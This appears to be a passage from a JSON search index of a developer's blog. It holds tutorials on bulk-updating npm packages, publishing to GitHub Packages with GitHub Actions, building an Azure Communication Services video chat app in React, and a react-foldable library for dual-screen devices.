The output in the terminal will now look like this:\n1 "@types/istanbul-lib-report@latest" All that’s left to do is to pass the packages to npm install, so you’d possibly think we can just pipe the output:\n1 npm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies") | .key + "@latest"' | npm install Unfortunately, npm install doesn’t accept command line arguments provided by standard input, so instead we’ll use xargs to convert the standard input into command line arguments:\n1 npm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies") | .key + "@latest"' | xargs npm install And with that, our upgrade is fully underway!\nConclusion I’m going to keep this snippet handy for when I’m coming back to projects that I haven’t worked on for a while, as it’s an easy way to do a large number of updated.\nAn alternative option you can look at is npm-check-updates, which is a command line utility that will update in a similar manner to above, but also has other feature to how it controls updates.\n", "id": "2020-11-23-bulk-updating-outdated-npm-packages" }, { "title": "5 Key Things From dotnet 5", "url": "https://www.aaron-powell.com/posts/2020-11-12-5-key-things-from-dotnet-5/", "date": "Thu, 12 Nov 2020 14:03:37 +1100", "tags": [ "dotnet", "public-speaking" ], "description": "Want to learn some of the best parts of .NET 5? Join me at Devs Speak", "content": "With .NET 5 being launched and a multi-day event covering all things new, it’s easy to get lost trying to wade through all of the announcements.\nBut don’t stress, I’ll be covering off the 5 things I think are most exciting from the launch at Devs Speak on the 20th Nov (5pm - 7pm ADST).\nGrab yourself a ticket and join me and a bunch of awesome folks from around APAC to learn all things .NET.\n", "id": "2020-11-12-5-key-things-from-dotnet-5" }, { "title": "Deploy to GitHub Packages With GitHub Actions", "url": "https://www.aaron-powell.com/posts/2020-11-06-deploy-to-github-packages-with-github-actions/", "date": "Fri, 06 Nov 2020 09:25:07 +1100", "tags": [ "devops", "javascript", "dotnet" ], "description": "Let's look at how to automate releases to GitHub Packages using GitHub Actions", "content": "You’ve started a new project in which you’re creating a package to release on a package registry and you want to simplify the workflow in which you push some changes to be tested in an app, without a lot of hassle of copying local packages around.\nThe simplest solution to this is to push to npm, but that can be a bit cluttering, especially if you’re iterating quickly.\nThis is a predicament that I found myself in recently, and decided it was finally time to check out GitHub Packages. GitHub Package supports a number of different package repository formats such as npm, NuGet, Maven and Docker, and integrates directly with the existing package management tool chain. For this post, we’ll use a npm package, but the concept the same for all registry types.\nCreating a Workflow To do this workflow, we’ll use GitHub Actions as our workflow engine. I’ve blogged in the past on getting started with GitHub Actions, so if you’re new to them I’d suggest using that to brush up on the terminology and structure of a workflow file.\nStart by created a workflow file in .github/workflows and call it build.yml. 
We want this workflow to run every time someone pushes to the main branch, or when a PR is opened against it, so we’ll set that as our trigger:\n1 2 3 4 5 6 7 name: Node.js CI on: push: branches: [ main ] pull_request: branches: [ main ] Next, we’ll create a job that does your normal build process. Remember that this is a Node package, so it’s written for that, but swap it out for npm calls, or whatever platform you’re targeting:\n1 2 3 4 5 6 7 8 9 10 11 12 jobs: build: runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x - run: npm ci - run: npm run lint - run: npm test Building a Package With the workflow running our standard verification checks, the next job will generate the package. Personally, I like to extract it out to a separate job so it’s clear which phase of our workflow a failure has happened. This new job will be called package and it’ll need the build job to complete first, which we specify with the needs property:\n1 2 3 4 5 6 7 8 9 package: needs: [build] runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x One down-side of doing this as a separate job is that we’ll need to prepare the artifacts for the package to be created again, as they aren’t available from the build job (unless you upload them, but that might be really slow if you have a lot of dependencies), so we’ll have to get them again.\n1 2 3 4 5 6 7 8 9 10 11 package: needs: [build] runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x - run: npm ci For this example, we’re only installing the npm packages, but if it was a TypeScript project you’d want to run the tsc compilation, .NET projects would need to compile, etc.\nWith dependencies installed, it’s time to generate the package:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 package: needs: [build] runs-on: ubuntu-18.04 steps: - uses: actions/checkout@v2 - name: Use Node.js 14.x uses: actions/setup-node@v1 with: node-version: 14.x - run: npm ci - run: npm version prerelease --preid=ci-$GITHUB_RUN_ID --no-git-tag-version - run: npm pack - name: Upload uses: actions/upload-artifact@v2 with: name: package path: "*.tgz" With npm we have a version command that can be used to bump the version that the package is going to be created, and you can use it to bump each part of the semver string (check out the docs for all options). Since this is happening as part of a CI build, we’ll just tag it as a pre-release package bump, and use the ID of the build as the version suffix, making it unique and auto-incrementing across builds. We’ll also give it the --no-git-tag-version flag since we don’t need to tag the commit in Git, as that tag isn’t getting pushed (but obviously you can do that if you prefer, I just wouldn’t recommend it as part of a CI build as you’d get a lot of tags!).\nIf you’re using .NET, here’s the run step I use:\n1 run: dotnet pack --configuration Release --no-build --version-suffix "-ci-$GITHUB_RUN_ID" --output .output Finally, we’ll use the upload Action to push the package to the workflow so we can download it from the workflow to do local installs, or use it in our final job to publish to GitHub Packages.\nPublishing a Package With our package created and appropriately versioned it’s time to put it in GitHub Packages. 
Again, we’ll use a dedicated job for this, and it’s going to depend on the package job completion:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 publish: name: "Publish to GitHub Packages" needs: [package] runs-on: ubuntu-18.04 if: github.repository_owner == 'aaronpowell' steps: - name: Upload uses: actions/download-artifact@v2 with: name: package - uses: actions/setup-node@v1 with: node-version: 14.x registry-url: https://npm.pkg.github.com/ scope: "@aaronpowell" - run: echo "registry=https://npm.pkg.github.com/@aaronpowell" >> .npmrc - run: npm publish $(ls *.tgz) env: NODE_AUTH_TOKEN: ${{secrets.GITHUB_TOKEN}} You’ll notice that here we have an if condition on the job and that it’s checking the GitHub context object to ensure that the owner is the organisation that this repo belongs to. The primary reason for this is to reduce the chance of a failed build if someone pushes a PR from a fork, it won’t have access to secrets.GITHUB_TOKEN, and as such the job would fail to publish, resulting in a failed job. You may want to tweak this condition, or remove it, depending on your exact scenario.\nThis job also doesn’t use the actions/checkout Action, since we don’t need the source code. Instead, we use actions/download-artifact to get the package file created in the package job.\nTo publish with npm, we’ll setup node, but configure it to use the GitHub Packages registry, which is https://npm.pkg.github.com/ and define the current organisation as the scope (@aaronpowell).\nWe’ll then setup the .npmrc file, specifying the registry again. This ensures that the publishing of the package will go through to the GitHub Packages endpoint, rather than the public npm registry.\nLastly, we run npm publish and since we’re publishing the package from an existing tgz, not from a folder with a package.json, we have to give it the file path. Since we don’t know what the version number is we can use ls *.tgz to get it and inline that to the command.\nQuick note, GitHub Packages only supports scoped npm packages (ref), so your package name will need to be scoped like @aaronpowell/react-foldable.\nConclusion With this done, each build will create a GitHub Package that you can use. You’ll find a full workflow example on my react-foldable project.\nThe requirement for npm packages to be scoped caught me out initially, but it’s an easy change to make, especially early on in a project.\nUltimately though, this helps give a quicker feedback loop between making a change to a package and being able to integrate it into a project, using the standard infrastructure to consume packages.\n", "id": "2020-11-06-deploy-to-github-packages-with-github-actions" }, { "title": "Building a Video Chat App, Part 3 - Displaying Video", "url": "https://www.aaron-powell.com/posts/2020-11-05-building-a-video-chat-app-part-3-displaying-video/", "date": "Thu, 05 Nov 2020 09:43:26 +1100", "tags": [ "javascript", "azure" ], "description": "We've got access to the camera, now to display the feed", "content": "On my Twitch channel we’re continuing to build our video chat application on Azure Communication Services (ACS).\nLast time we learnt how to access the camera and microphone using the ACS SDK, and today we’ll look to display that camera on the screen.\nDisplaying Video As we learnt in the last post, cameras are available via a MediaStream in the browser, which we get when the user grants us access to their cameras. With raw JavaScript this can be set as the src attribute of a <video> element and the camera feed is displayed. 
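As a rough sketch of that raw approach (note that current browsers expect the stream on the element’s srcObject property rather than src, and the element id here is just a placeholder of mine):

// Assumes a <video id="preview" autoplay playsinline></video> element exists on the page
async function showCameraPreview() {
  const stream = await navigator.mediaDevices.getUserMedia({ video: true });
  const video = document.getElementById("preview");
  video.srcObject = stream; // the modern equivalent of setting video.src
  await video.play();
}

showCameraPreview().catch(err => console.error("Could not start the camera", err));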
But there’s some orchestration code to setup and events to handle, so thankfully ACS gives us an API to work with, LocalVideoStream and Renderer.\nCreating a LocalVideoStream The LocalVideoStream type requires a VideoDeviceInfo to be provided to it, and this type is what we get back from the DeviceManager (well, we get an array of them, you then pick the one you want).\nWe’ll start by creating a new React context which will contain all the information that a user has selected for the current call.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 export type UserCallSettingsContextType = { setCurrentCamera: (camera?: VideoDeviceInfo) => void; setCurrentMic: (mic?: AudioDeviceInfo) => void; setName: (name: string) => void; setCameraEnabled: (enabled: boolean) => void; setMicEnabled: (enabled: boolean) => void; currentCamera?: VideoDeviceInfo; currentMic?: AudioDeviceInfo; videoStream?: LocalVideoStream; name: string; cameraEnabled: boolean; micEnabled: boolean; }; const nie = <T extends unknown>(_: T): void => { throw Error("Not Implemented"); }; const UserCallSettingsContext = createContext<UserCallSettingsContextType>({ setCurrentCamera: nie, setCurrentMic: nie, setName: nie, setCameraEnabled: nie, setMicEnabled: nie, name: "", cameraEnabled: false, micEnabled: false }); Note: I’ve created a stub function that throws an exception for the default hook setter functions called nie.\nThe context will provide a few other pieces of data that the user is selecting, such as their preferred mic and their name, but we’re really focusing on the videoStream which will be exposed.\nNow let’s implement the context provider:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 export const UserCallSettingsContextProvider = (props: { children: React.ReactNode; }) => { const [currentCamera, setCurrentCamera] = useState<VideoDeviceInfo>(); const [currentMic, setCurrentMic] = useState<AudioDeviceInfo>(); const [videoStream, setVidStream] = useState<LocalVideoStream>(); const { clientPrincipal } = useAuthenticationContext(); const [name, setName] = useState(""); const [cameraEnabled, setCameraEnabled] = useState(true); const [micEnabled, setMicEnabled] = useState(true); useEffect(() => { if (clientPrincipal && !name) { setName(clientPrincipal.userDetails); } }, [clientPrincipal, name]); useEffect(() => { // TODO - handle camera selection }, [currentCamera, videoStream]); return ( <UserCallSettingsContext.Provider value={{ setCurrentCamera, setCurrentMic, currentCamera, currentMic, videoStream, setName, name, setCameraEnabled, cameraEnabled, setMicEnabled, micEnabled }} > {props.children} </UserCallSettingsContext.Provider> ); }; export const useUserCallSettingsContext = () => useContext(UserCallSettingsContext); When the currentCamera is changed (by user selection or otherwise) we’re going to want to update the LocalVideoStream, and that’s the missing useEffect implementation. First off, we’ll need to create one if it doesn’t exist, but since we can’t create it until there’s a selected camera, we’ll check for that:\n1 2 3 4 5 6 useEffect(() => { if (currentCamera && !videoStream) { const lvs = new LocalVideoStream(currentCamera); setVidStream(lvs); } }, [currentCamera, videoStream]); Using the LocalVideoStream We’ve got ourselves a video stream, but what do we do with it? 
We need to create a Renderer that will handle the DOM elements for us.\nLet’s create a component that uses the context to access the LocalVideoStream:\nconst VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); return <div>Show video here</div>; }; export default VideoStream; The Renderer, which we’re going to create shortly, gives us a DOM element that we need to inject into the DOM that React is managing for us, and to do that we’ll need access to the DOM element, obtained using a ref.\nconst VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); const vidRef = useRef<HTMLDivElement>(null); return <div ref={vidRef}>Show video here</div>; }; Since our videoStream might be null (camera is off or just unselected), we’ll only create the Renderer when needed:\nconst VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); const vidRef = useRef<HTMLDivElement>(null); const [renderer, setRenderer] = useState<Renderer>(); useEffect(() => { if (videoStream && !renderer) { setRenderer(new Renderer(videoStream)); } }, [videoStream, renderer]); return ( <div ref={vidRef}>Show video here</div> ); }; With the Renderer created, the next thing to do is request a view from it, which displays the camera feed. We’ll do this in a separate effect for simplicity’s sake:\nconst VideoStream = () => { const { videoStream } = useUserCallSettingsContext(); const vidRef = useRef<HTMLDivElement>(null); const [renderer, setRenderer] = useState<Renderer>(); useEffect(() => { if (videoStream && !renderer) { setRenderer(new Renderer(videoStream)); } }, [videoStream, renderer]); useEffect(() => { if (renderer) { renderer.createView().then((view) => { vidRef.current!.appendChild(view.target); }); } return () => { if (renderer) { renderer.dispose(); } }; }, [renderer, vidRef]); return ( <div ref={vidRef}></div> ); }; The createView method from the Renderer will return a Promise<RendererView> that has information on the scaling mode and whether the video is mirrored (so you could apply your own mirror transform), as well as the target DOM element, which we can append to the children of the DOM element captured via the vidRef ref. You’ll notice that I’m doing !. before appendChild, and this is to trick the TypeScript compiler, as it doesn’t properly understand the useRef assignment. Yes, it’s true that the vidRef could be null (its default value), but that’d require the hooks and Promise to execute synchronously, which isn’t possible, so we can override the type check using the !
postfix assertion.\nChanging Camera Feeds It’s possible that someone has multiple cameras on their machine and they want to switch between them, how would you go about doing that?\nThe first thought might be that we create a new LocalVideoStream and Renderer, but it’s actually a lot simpler than that as the LocalVideoStream provides a switchSource method that will change the underlying camera source and in turn cascade that across to the Renderer.\nWe’ll update our context with that support:\n1 2 3 4 5 6 7 8 9 10 11 12 useEffect(() => { if (currentCamera && !videoStream) { const lvs = new LocalVideoStream(currentCamera); setVidStream(lvs); } else if ( currentCamera && videoStream && videoStream.getSource() !== currentCamera ) { videoStream.switchSource(currentCamera); } }, [currentCamera, videoStream]); This new conditional branch will make sure we have a camera, video stream and the selected camera isn’t already set (this was a side effect of React hooks and not something you’d necessarily need to do), and that’s all we need for switching, we don’t need to touch our Renderer at all.\nConclusion There we have it, we’re now displaying the camera feed and you can see yourself. The use of the LocalVideoStream and Renderer from the ACS SDK makes it a lot simpler to handle the events and life cycle of the objects we need to work with.\nIf you want to see the full code from the sample application we’re building, you’ll find it on my GitHub.\nIf you want to catch up on the whole episode, as well as look at how we integrate this into the overall React application, you can catch the recording on YouTube, along with the full playlist\n", "id": "2020-11-05-building-a-video-chat-app-part-3-displaying-video" }, { "title": "Building a Video Chat App, Part 2 - Accessing Cameras", "url": "https://www.aaron-powell.com/posts/2020-10-22-building-a-video-chat-app-part-2-accessing-cameras/", "date": "Thu, 22 Oct 2020 09:55:12 +1100", "tags": [ "javascript", "azure" ], "description": "Lights, camera, action! It's time to get devices for our app.", "content": "On my Twitch channel we’re continuing to build our video chat application on Azure Communication Services (ACS).\nFor today’s post, we’re going to look at the next major milestone, accessing your camera and microphone.\nHow Browsers Access Devices We’re going to use the ACS SDK to do this, but before we get there let’s first understand how we access cameras and microphones in the browser. Browsers have had this functionality for a while now, it came about as a need for the WebRTC specification, since that allows you to do what we’re doing, run a video stream through the browser, and it works using the navigator.mediaDevices API which replaced navigator.getUserMedia.\nThis API is promised based, so it works nicely with async/await, and will return us the MediaStream available to the browser.\nThere is a catch though, the user has to consent to providing access to the devices, which makes sense as you don’t want any random website to be able to access your camera and mic without you knowing about it, do you? 
The user will see a prompt like so:\nIn “raw JavaScript” we’d write something like this:\n1 2 3 4 5 6 7 8 navigator.mediaDevices .getUserMedia({ audio: true, video: true }) .then(function(stream) { /* use the stream */ }) .catch(function(err) { /* handle the error */ }); If the user denies the request then the catch of the promise is triggered (or if they’ve previously denied it), otherwise you’ll end up in the MediaStream for the camera/mic they have selected. The MediaStream can be provided to a <video> element and you can look at yourself.\nAccessing Devices with ACS Now that we understand the fundamentals, let’s look at how we use this in the ACS SDK to get one step closer to establishing out video call.\nWe’ll need to add some npm packages to our UI:\n1 npm install --save @azure/communication-calling @azure/communication-common With these packages, we’re going to need four APIs, AzureCommunicationUserCredential, CallClient, CallAgent and DeviceManager.\nTo make the important parts of this available throughout our application, we’re going to create a React Context to hold it, so let’s get started with that.\nDefining Our Context Let’s create a file called useCallingContext.tsx since we’ll have the context in there as well as a hook to access context, and define our context:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import { AudioDeviceInfo, CallAgent, CallClient, DeviceManager, VideoDeviceInfo } from "@azure/communication-calling"; import { AzureCommunicationUserCredential } from "@azure/communication-common"; import React, { useState, useEffect, useContext } from "react"; import useToken from "./useToken"; export type CallingProps = { micList?: AudioDeviceInfo[]; cameraList?: VideoDeviceInfo[]; callAgent?: CallAgent; deviceManager?: DeviceManager; }; const CallingContext = React.createContext<CallingProps>({}); The context will have available on it the list of cameras and mics, along with the CallAgent and DeviceManager instances since they will be useful later.\nSince the logic to setup all the data available on the context only happens once, we’ll implement the context provider within this file to, so let’s do that.\n1 2 3 4 5 6 7 8 9 export const CallingContextProvider = (props: { children: React.ReactNode; }) => { return ( <CallingContext.Provider value={/* todo */}> {props.children} </CallingContext.Provider> ); }; Lastly, we’ll expose a hook to make it easy to access the context elsewhere in the application:\n1 export const useCallingContext = () => useContext(CallingContext); Great, we’re now ready to implement the context provider.\nImplementing the Context Provider The context provider here is key, as it’s the thing that’ll be responsible for getting the devices and making them available elsewhere in our application, and for that we’re going to need some local state.\n1 2 3 4 5 6 7 8 9 export const CallingContextProvider = (props: { children: React.ReactNode; }) => { const token = useToken(); const [, setClient] = useState<CallClient>(); const [callAgent, setCallAgent] = useState<CallAgent>(); const [deviceManager, setDeviceManager] = useState<DeviceManager>(); const [cameraList, setCameraList] = useState<VideoDeviceInfo[]>(); const [micList, setMicList] = useState<AudioDeviceInfo[]>(); We’re going to need the token that is generated for the user in Part 1, and we’re doing that through a custom hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import { useState, useEffect } from "react"; export type TokenResponse = { token: string; expiresOn: 
Date; communicationUserId: string; }; const useToken = () => { const [token, setToken] = useState(""); useEffect(() => { const run = async () => { const res = await fetch("/api/issueToken"); const tokenResponse: TokenResponse = await res.json(); setToken(tokenResponse.token); }; run(); }, []); return token; }; export default useToken; Then we’ve got some more state for the different parts of the ACS SDK that we’re going to expose, except for the CallClient which we only need to establish the other parts of the API.\nWe’ll use an effect hook to set this up, that’ll be triggered when the token is available to us:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 useEffect(() => { const run = async (callClient: CallClient, token: string) => { const tokenCredential = new AzureCommunicationUserCredential(token); let callAgent: CallAgent | undefined = undefined; try { callAgent = await callClient.createCallAgent(tokenCredential); const deviceManager = await callClient.getDeviceManager(); const result = await deviceManager.askDevicePermission(true, true); if (result.audio) { setMicList(deviceManager.getMicrophoneList()); } if (result.video) { setCameraList(deviceManager.getCameraList()); } setCallAgent(callAgent); setDeviceManager(deviceManager); } catch { if (callAgent) { callAgent.dispose(); } } }; if (token) { const callClient = new CallClient(); setClient(callClient); run(callClient, token); } }, [token]); Ok, that’s a lot of code, let’s break it down piece by piece, starting at the bottom:\n1 2 3 4 5 if (token) { const callClient = new CallClient(); setClient(callClient); run(callClient, token); } This is a check to make sure that the user token has been issued, and once it has been we’re going to call an async function (run), because an effect hook can’t take an async function directly, and the run function is really where things happen.\nFirst off, this function is going to create the credentials for ACS from the token provided:\n1 const tokenCredential = new AzureCommunicationUserCredential(token); Next, we’ll setup a try/catch block to access the devices, and remember that the reason we’d do it this way is so that if the user declines the request to access devices, we can gracefully handle the error (the async/await unwraps a promises catch into the catch of the try/catch block).\nWe’ll create the callAgent using the credentials:\n1 callAgent = await callClient.createCallAgent(tokenCredential); We’re not actually using the callAgent yet, it’s what we use to connect to calls, but we need to create an instance of it before we access the DeviceManager. I’m unclear as to why it’s this way, and it’s something I’m going to raise with the ACS team.\nWith our callAgent created, it’s now time to access the DeviceManager, which will give us all the devices:\n1 2 3 4 5 6 7 8 9 10 const deviceManager = await callClient.getDeviceManager(); const result = await deviceManager.askDevicePermission(true, true); if (result.audio) { setMicList(deviceManager.getMicrophoneList()); } if (result.video) { setCameraList(deviceManager.getCameraList()); } From the deviceManager, which we get from callClient.getDeviceManager, we need to request permissions from the user to access their device list using askDevicePermissions. This method takes two arguments, whether you want audio and video access, and for our case we do. 
Assuming the user grants permissions, we can then use deviceManager.getMicrophoneList and deviceManager.getCameraList to get arrays of AudioDeviceInfo and VideoDeviceInfo that we can present to the user for their selection.\nThis is the same as if you were to call the enumerateDevices method from MediaDevices, but the SDK takes the liberty of splitting the enumerated devices into their appropriate types. What’s important to know about this is that you must call askDevicePermissions first, otherwise you’ll get an array with a single unknown device. That’s because enumerateDevices, which is what’s used internally by the SDK, accesses the available devices without prompting for consent and if consent hasn’t been provided, you can’t get the devices.\nConclusion Our React context is all ready for integration into the application. We’ve learnt how to get started using the ACS SDK and its DeviceManager to request permission for the devices and then display the full list of them.\nIf you want to catch up on the whole episode, as well as look at how we integrate this into the overall React application, you can catch the recording on YouTube, along with the full playlist\n", "id": "2020-10-22-building-a-video-chat-app-part-2-accessing-cameras" }, { "title": "Come Learn Node.js With Us", "url": "https://www.aaron-powell.com/posts/2020-10-21-come-learn-nodejs-with-us/", "date": "Wed, 21 Oct 2020 09:43:46 +1100", "tags": [ "javascript" ], "description": "First we created a JavaScript series, now it's Node.js time", "content": "Recently, we launched a JavaScript beginner YouTube series and now it’s time for another new series…\nBeginners Series to: Node.js!\nIn this free, 26 part video series, we’ll cover everything from setting up a Node project to working with the file system, to setting up APIs with Express and debugging with VS Code.\nYou can check it out on Channel9 or on YouTube.\n", "id": "2020-10-21-come-learn-nodejs-with-us" }, { "title": "Upping Your Speaker Game With Auto Posting from PowerPoint", "url": "https://www.aaron-powell.com/posts/2020-10-19-upping-your-speaker-game-with-auto-posting-from-powerpoint/", "date": "Mon, 19 Oct 2020 09:28:16 +1100", "tags": [ "public-speaking" ], "description": "Solving problems no one has with tools they don't need!", "content": "Last week I was procrastinating on my talk for NDC Sydney and realised I had a lot of links that I wanted to share with people who would be watching the session, but wasn’t sure what would be the best way to do it. As a virtual event, NDC had a slack channel for the conference, so it’d just be a case of putting the links in there.\nBut I started to wonder, how could I make it a bit more interesting, and then I remembered that a couple of weeks ago I came across this tweet from Scott Hanselman\nVirtual PowerPoint Greenscreens! Change a PowerPoint Slide and Change an OBS scene *simultaneously* in 50 lines of C# https://t.co/yKyuDeJDN2 via @YouTube\n— Scott Hanselman 🌮 (@shanselman) September 14, 2020 As someone who’s been doing a bunch of stuff with OBS, I liked the idea, it’s a nifty way to change up the experience when presenting and giving the audience something different compared to your traditional picture-in-picture view.\nAnd this gave me an idea, since we can use the PowerPoint interop API to read the notes, why couldn’t we use it to push to Slack instead?\nSo, I built that. 
You’ll find the code on GitHub for PowerPoint to Places, along with some instructions on how to get it working.\nFeel free to give it a try, but be aware that it’s written by me, for me, so I make no claims that it’ll work for you, but if people think it’d be a useful tool, let’s make it more general purpose!\n", "id": "2020-10-19-upping-your-speaker-game-with-auto-posting-from-powerpoint" }, { "title": "Want to Learn JavaScript? We've Got a Series for You!", "url": "https://www.aaron-powell.com/posts/2020-10-13-want-to-learn-javascript-weve-got-a-series-for-you/", "date": "Tue, 13 Oct 2020 16:47:11 +1100", "tags": [ "javascript" ], "description": "Get ready to dive into all things JavaScript", "content": "Over the last few months I’ve been working with a number of the other Cloud Advocates at Microsoft to put together a video series that we’ve been wanting to do for a while now…\nIntroducing the Beginners Series to: JavaScript!\nThis is a 51 (!!) part series where we cover all the fundamentals of JavaScript, from setting up an environment to the language constructs to data types. You can read the announcement post here but what you really want to do is watch the series, so head over to YouTube and get learning!\n", "id": "2020-10-13-want-to-learn-javascript-weve-got-a-series-for-you" }, { "title": "Foldable Displays With Surface Duo and React", "url": "https://www.aaron-powell.com/posts/2020-10-08-foldable-displays-with-surface-duo-and-react/", "date": "Thu, 08 Oct 2020 10:12:28 +1000", "tags": [ "javascript", "surfaceduo", "react" ], "description": "Let's look at how we can make a foldable web experience using React for the Surface Duo", "content": "Last month Microsoft released the long awaited Surface Duo, a foldable, dual-screen mobile device.\nWhile it’s not (yet?) available in Australia, it didn’t stop me being interested in it, in particular because of what they are doing for web developers. You can read the full blog post here but the key points are:\nCSS primitives to detect the layout spanning mode CSS variables for screen and hinge dimensions A JavaScript API for getting window segments Basically, the browser sees both displays as a single viewport and it’s up to you to manage how that viewport is utilised, and in particular, how you manage the gap between them (which the browser doesn’t know about). Armed with this knowledge, I decided to have a look at how we can do responsive design and progressive enhancement for web applications, targeting a Surface Duo, using React.\nSetting up an environment As mentioned above, the Duo isn’t available outside of the US (at the time of writing), so how can we get up and running with it? With the browser dev tools of course! Here’s a blog about it all, but the way it works is the same way as any other mobile device emulation in Chrome or Edge, it’s just available*, so we can get started building an application.\n*Note: This is still classed as experimental in the browser, so you’ll need to be running Edge or Chrome Canary, and enable it from edge://flags. Read more about that here.\nOrigin Trials If you’re wanting to deploy this out to a wider set of users, but don’t want each one to configure their browser directly, you can setup an Origin Trial, which allows you to create time-boxed periods in which experimental features are enabled for your users. 
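The trial token itself is served either as an Origin-Trial HTTP header or a meta tag; as a rough sketch, you can also inject it from JavaScript at runtime (the token string below is a placeholder for the value you receive when registering your origin):

// Register an origin trial token at runtime - "YOUR_ORIGIN_TRIAL_TOKEN" is a placeholder
const otMeta = document.createElement("meta");
otMeta.httpEquiv = "origin-trial";
otMeta.content = "YOUR_ORIGIN_TRIAL_TOKEN";
document.head.appendChild(otMeta);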
Check out this article on how to get started, and I’ve also added it to the demo app.\nIntroducing React-Foldable React is my happy place when it comes to JavaScript UI libraries, so I wanted to think about how I’d want to use React to progressively enhance an application, and this has led me to create react-foldable.\nreact-foldable is a series of React components and hooks that make it easier to work with a foldable device, using the proposed standards mentioned above.\nCreating a foldable layout My first goal is to look at how we can target the different displays with content, and react to the change, meaning that if we’re in a single display mode and “unfold” into dual-display, we want the ability to bring in more content.\nWe’ll start by creating a foldable zone in our application. This basically says that we’re going to be observing changes to the foldability of the device and reacting accordingly.\n1 2 3 4 import React from "react"; import { Foldable } from "react-foldable"; const App = () => <Foldable>{/* TODO: Components */}</Foldable>; Inside the <Foldable> component we specify <FoldableScreen> components, which are added/removed from the component tree.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import React from "react"; import "./App.css"; import { Foldable, FoldableScreen } from "react-foldable"; import { MainApp } from "./MainApp"; import { SecondScreen } from "./SecondScreen"; function App() { return ( <Foldable> <FoldableScreen matchScreen={0} component={MainApp} /> <FoldableScreen matchScreen={1} component={SecondScreen} /> </Foldable> ); } export default App; Each <FoldableScreen> needs to be told which screen to match. Non-foldable devices will always have a 0 screen, so that is where you’d put the things you always want displayed. There’s no restriction on the number of components you can have matching a screen either, as <FoldableScreen> acts like a wrapper component to determine whether or not it displays.\nAdvanced matching Matching on a screen is good for a lot of common scenarios, but what if you’re wanting to conditionally show a component depending on whether the device supports dual screen or not? For this, we’d use the match prop, like so:\n1 2 3 4 5 6 <Foldable> <FoldableScreen match={({ isDualScreen }) => isDualScreen} component={() => <p>I'm only appearing when we can dual-screen</p>} /> </Foldable> The match prop takes a function with the signature (props: FoldableContextProps) => boolean, where FoldableContextProps is defined like so:\n1 2 3 4 5 interface FoldableContextProps { windowSegments?: DOMRect[]; isDualScreen: boolean; screenSpanning: ScreenSpanning; } Using this, we can completely remove a component if it’s in dual screen mode, allowing you to swap out large chunks of the component hierarchy.\nUsing hooks While swapping components can work in many cases, sometimes you’ll want to programmatically detect the foldable information, and to make this easier there are a series of hooks.
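As a rough sketch of what that looks like (assuming useDualScreen is exported from the package and returns a boolean, as described in the list that follows):

import React from "react";
import { useDualScreen } from "react-foldable";

// Reads the foldable state directly, no <FoldableScreen> wrapper required.
const ScreenBadge = () => {
  const isDualScreen = useDualScreen();
  return <p>{isDualScreen ? "Spanning two screens" : "Single screen"}</p>;
};

export default ScreenBadge;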
In fact, the hook values are all exposed through the FoldableContextProps type on the match as well, so the component dogfoods itself!\nuseDualScreen - a boolean to indicate whether or not the device is in dual-screen mode useScreenSpanning - indicates whether the screen is horizontal, vertical or unknown (unknown is primarily when it’s not a foldable device) useWindowSegments - returns an array of DOMRect that shows the bounding dimensions for each screen (non-foldable devices will return an array of one) useFoldableContext - easy access to the React context containing all of the above values Conclusion This was a quick introduction to react-foldable, a library that I’ve been building to hopefully make it easier to create progressively enhanced applications for foldable devices using React.\nYou’ll find a demo of the component at https://react-foldable.aaron-powell.com/.\nI’m very much open to feedback on how the component works and the general design, as right now it’s very much how I would tackle the problem, but if there’s aspects to prove on do reach out.\n", "id": "2020-10-08-foldable-displays-with-surface-duo-and-react" }, { "title": "Building a Video Chat App, Part 1 - Setup", "url": "https://www.aaron-powell.com/posts/2020-10-06-building-a-video-chat-app-part-1-setup/", "date": "Tue, 06 Oct 2020 09:18:43 +1000", "tags": [ "javascript", "azure" ], "description": "Let's get started with building our video chat app", "content": "Last week I kicked off a new stream series in which we’re going to take a look at Azure Communication Services (ACS).\nWell, the first episode is out and I wanted to document what we learnt with building on ACS.\nSetting the scene ACS is essentially the backend for Teams, but provided in a way that you can integrate it into your existing applications. For our case, we’re building from scratch and the target deployment is going to be Azure Static Web Apps (SWA) as this will give us an API backend (for user management), a host for our React front end and most importantly, account management.\nFor the codebase, we’re starting with a React TypeScript GitHub template that I’ve created for SWA, with the API backend written in TypeScript Azure Functions.\nGiving users access One thing that is really awesome about ACS is that you bring your own authentication model, meaning that you aren’t being forced to port your application to Azure AD or anything, but it does raise the question, how do you grant the user access?\nWell, this is where the API backend that we’re using in SWA comes into play, you need a token service that will issue tokens for the users, however your representing them. Let’s take a look at how to do that.\nCreating a token service We’ll use a HTTP Trigger to do this, and it’ll live at /api/issueToken. Start by creating that within the api folder of the Git repo:\n1 func new --template HttpTrigger --name issueToken In our Function, the first thing that we’ll do is the ensure that there is a logged in user. 
